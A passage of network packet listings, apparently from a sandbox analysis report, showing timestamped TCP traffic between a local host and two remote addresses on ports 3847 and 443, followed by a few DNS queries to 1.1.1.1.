                                                                                                                                                Dec 18, 2024 19:28:12.270108938 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.270287991 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.270344019 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.271456957 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.271548986 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.271581888 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.272793055 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.272910118 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.272958040 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.274131060 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.274274111 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.274328947 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.275420904 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.275521994 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.275589943 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.276758909 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.276917934 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.277002096 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.278178930 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.278291941 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.278341055 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.279335022 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.279468060 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.279509068 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.280667067 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.280781031 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.280819893 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.281975985 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.282075882 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.282118082 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.283381939 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.283555031 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.283643007 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.284646988 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.284770966 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.284838915 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.285913944 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.286015987 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.286062002 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.287201881 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.287348986 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.287394047 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.288543940 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.288671017 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.288719893 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.289892912 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.290021896 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.290062904 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.291146040 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.291666985 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.433208942 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.433305025 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.553181887 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.843055964 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.844439030 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.844521046 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.844535112 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.845124006 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.845175982 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.845457077 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.845465899 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.845519066 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.846169949 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.846180916 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.846232891 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.847484112 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.847589016 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.847665071 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.848767042 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.849253893 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.849263906 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.849297047 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.850409031 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.850462914 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.850569963 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.851902962 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.851916075 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.851958036 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.853113890 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.853168964 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.853245974 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.854511976 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.854521990 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.854574919 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.855648041 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.855771065 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.855798006 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.856966972 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.857024908 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.857141972 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.858428955 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.858444929 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.858470917 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.859616995 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.859704971 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.859766006 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.860941887 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.860994101 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.861043930 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.862384081 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.862396002 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.862437010 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.863707066 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.863723993 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.863749981 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.864948988 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.865000963 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.865050077 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.866210938 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.866265059 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.866341114 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.867866993 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.867877007 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.868065119 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.868979931 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.868990898 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.869041920 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.870161057 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.870209932 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.870280027 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.871457100 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.871540070 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.871634007 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.873048067 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.873059034 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.873100042 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.874106884 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.874161005 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.874309063 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.875504971 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.875564098 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.875585079 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.876730919 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.876785994 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.876825094 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.878087044 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.878206968 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.878283024 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.879362106 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.879412889 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.879520893 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.880693913 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.880748034 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.880844116 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.882025957 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.882072926 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.882080078 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.883517027 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.883528948 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.883634090 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.884648085 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.884707928 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.884752035 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.885979891 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.886037111 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.886082888 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.887226105 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.887280941 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.887358904 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.888631105 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.888641119 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.888685942 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.889976025 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.890031099 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.890091896 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.891235113 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.891365051 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.891372919 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.892643929 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.892733097 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.892765045 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.893924952 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.893976927 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.893978119 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.895420074 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.895456076 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.895478010 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.896543026 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.896600962 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.896730900 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.897811890 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.897938967 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.898075104 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.899058104 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.899122000 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.899224043 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.900439978 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.900542974 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.900631905 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.901793957 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.901824951 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.901844978 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.903063059 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.903141022 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.903173923 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.904814005 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.904825926 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.904874086 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.905865908 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.905878067 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.905910015 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.906990051 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.907071114 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.907136917 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.908322096 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.908390045 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.908509016 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.909698009 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.909750938 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.909756899 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.911108017 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.911118984 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.911173105 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.912261009 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.912318945 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.912328005 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.913642883 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.913691044 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.913695097 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.962918043 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.036672115 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.036788940 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.036874056 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.037456036 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.037466049 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.037507057 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.038582087 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.038671970 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.038779974 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.039894104 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.040286064 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.040359020 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.040446043 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.041579008 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.041627884 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.041868925 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.042918921 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.042929888 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.042970896 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.044154882 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.044210911 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.044277906 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.045455933 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.045608997 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.045669079 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.046706915 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.046761036 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.046827078 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.048078060 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.048110962 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.048198938 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.048589945 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.168191910 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.168267012 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.287987947 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.576059103 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.576210976 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.576328039 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.577292919 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.577305079 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.577366114 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.577400923 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:13.697942972 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:13.697979927 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:20.681899071 CET49962443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:20.723340988 CET4434996245.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:21.714886904 CET49978443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:21.714930058 CET4434997845.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:21.714989901 CET49978443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:21.715102911 CET49978443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:21.715111971 CET4434997845.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:21.786887884 CET4434994345.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:21.786956072 CET49943443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:31.713557005 CET49978443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:31.759332895 CET4434997845.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:32.729307890 CET50004443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:32.729342937 CET4435000445.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:32.729396105 CET50004443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:32.729480982 CET50004443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:32.729489088 CET4435000445.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:32.830014944 CET4434996245.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:32.830073118 CET49962443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:42.728709936 CET50004443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:42.775326014 CET4435000445.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:43.728912115 CET50029443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:43.728925943 CET4435002945.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:43.729083061 CET50029443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:43.729083061 CET50029443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:43.729119062 CET4435002945.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:43.865222931 CET4434997845.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:43.865326881 CET49978443192.168.2.445.149.241.141

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 18, 2024 19:26:08.623895884 CET5474453192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:26:09.628732920 CET5474453192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:26:09.988111019 CET53547441.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:09.988130093 CET53547441.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:18.781996012 CET6251253192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:26:19.769424915 CET6251253192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:26:20.507648945 CET53625121.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:20.507929087 CET53625121.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:35.739362001 CET5798753192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:26:36.257674932 CET53579871.1.1.1192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:28.728341103 CET5250653192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:27:28.728527069 CET5811353192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:27:28.728739023 CET5925053192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:27:28.728909016 CET5860953192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:27:28.729322910 CET5169753192.168.2.41.1.1.1
                                                                                                                                                Dec 18, 2024 19:27:28.729993105 CET5045453192.168.2.41.1.1.1
